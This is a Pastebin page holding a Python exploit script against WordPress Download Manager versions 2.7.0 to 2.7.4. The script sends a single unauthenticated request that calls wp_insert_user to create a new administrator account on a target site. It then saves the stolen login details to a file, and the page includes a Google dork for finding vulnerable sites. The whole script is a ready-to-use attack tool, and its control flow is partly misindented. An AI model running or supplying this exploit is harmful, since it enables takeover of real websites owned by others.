Googleinurl

[EXPLOIT] Wordpress Download Manager R3m0t3 C0d3 Ex3cu

Dec 14th, 2014
779
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/python
  2. # Exploit Name: Wordpress Download Manager 2.7.0-2.7.4 Remote Command Execution
  3. # Vulnerability discovered by SUCURI TEAM (http://blog.sucuri.net/2014/12/security-advisory-high-severity-wordpress-download-manager.html)
  4. # Exploit written by Claudio Viviani  - http://www.homelab.it / Edited INURL - BRASIL
  5. # 2014-12-03:  Discovered vulnerability
  6. # 2014-12-04:  Patch released (2.7.5)
  7. # Video Demo: https://www.youtube.com/watch?v=rIhF03ixXFk
  8. # Dork google:  index of "wordpress-download"
  9.  
  10. import urllib, urllib2, socket
  11. import sys
  12. import string, random
  13. import optparse
  14. import datetime
  15. import os
  16.  
  17. # Check url
  18. def checkurl(url):
  19.     if url[:8] != "https://" and url[:7] != "http://":
  20.         print('[X] You must insert http:// or https:// procotol')
  21.         sys.exit(1)
  22.     else:
  23.         return url
  24.  
  25. # Check if file exists and has readable
  26. def checkfile(file):
  27.     if not os.path.isfile(file) and not os.access(file, os.R_OK):
  28.         now = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
  29.         print "0x" + str(now) + "[INFO][ERROR]: "+file+" file is missing or not readable"
  30.         sys.exit(1)
  31.     else:
  32.         return file
  33.  
  34. def id_generator(size=6, chars=string.ascii_uppercase + string.ascii_lowercase + string.digits):
  35.     return ''.join(random.choice(chars) for _ in range(size))
  36.  
  37. banner = """
  38. 0x[EXPLOIT NAME]: Wordpress Download Manager R3m0t3 C0d3 Ex3cut10n / INURL - BRASIL
  39. ------------------------------------------------------------------------------------------------------------------
  40. """
  41.  
  42. commandList = optparse.OptionParser('usage: %prog -t URL [--timeout sec]')
  43. commandList.add_option('-t', '--target', action="store",
  44.                   help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
  45.                   )
  46. commandList.add_option('--timeout', action="store", default=10, type="int",
  47.                   help="[Timeout Value] - Default 10",
  48.                   )
  49.  
  50. options, remainder = commandList.parse_args()
  51.  
  52. # Check args
  53. if not options.target:
  54.     print(banner)
  55.     commandList.print_help()
  56.     sys.exit(1)
  57.  
  58. host = checkurl(options.target)
  59. timeout = options.timeout
  60.  
  61. print(banner)
  62.  
  63. socket.setdefaulttimeout(timeout)
  64.  
  65. username = id_generator()
  66. pwd = id_generator()
  67.  
  68. body = urllib.urlencode({'action' : 'wpdm_ajax_call',
  69.                          'execute' : 'wp_insert_user',
  70.                          'user_login' : username,
  71.                          'user_pass' : pwd,
  72.                          'role' : 'administrator'})
  73.  
  74. headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'}
  75. now = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
  76. print "0x" + str(now) + "[INFO]: Tryng to connect to: "+host
  77. try:
  78.     req = urllib2.Request(host+"/", body, headers)
  79.     response = urllib2.urlopen(req)
  80.     html = response.read()
  81.  
  82.     if html == "":
  83.        now = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
  84.        print("0x" + str(now) + "[INFO][VALUE]: Account Added")
  85.        now = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
  86.        print("0x" + str(now) + "[INFO][VALUE]: Location: "+host+"/wp-login.php")
  87.        now = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
  88.        print("0x" + str(now) + "[INFO][VALUE]: Username: "+username)
  89.        now = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
  90.        print("0x" + str(now) + "[INFO][VALUE]: Password: "+pwd)
  91.  
  92.  
  93.        file_saved = 'Wordpress_Download_Manager_R3m0t3_C0d3_Ex3cut10n.txt'
  94.  
  95.        msg = '0x[INFO][FILE SAVED]: '+file_saved + "\n"
  96.        url_saved = "HOST:: "+host+" USER:: "+username+"PWD:: "+pwd+"\n"
  97.     if os.path.exists(file_saved):
  98.        arquivo = open(file_saved, 'a')
  99.        arquivo.write(url_saved)
  100.        arquivo.close()
  101.        print(msg)
  102.     else:
  103.        arquivo = open(file_saved, 'w')
  104.        arquivo.write(url_saved)
  105.        arquivo.close()
  106.        print(msg)
  107.  
  108.     else:
  109.        now = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
  110.        print("0x" + str(now) + "[INFO][FAIL]:  Exploitation Failed :(")
  111.  
  112. except urllib2.HTTPError as e:
  113.     print("0x" + str(now) + "[INFO][ERROR]:  "+str(e))
  114. except urllib2.URLError as e:
  115.     print("0x" + str(now) + "[INFO][ERROR]:  Connection Error: "+str(e))
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×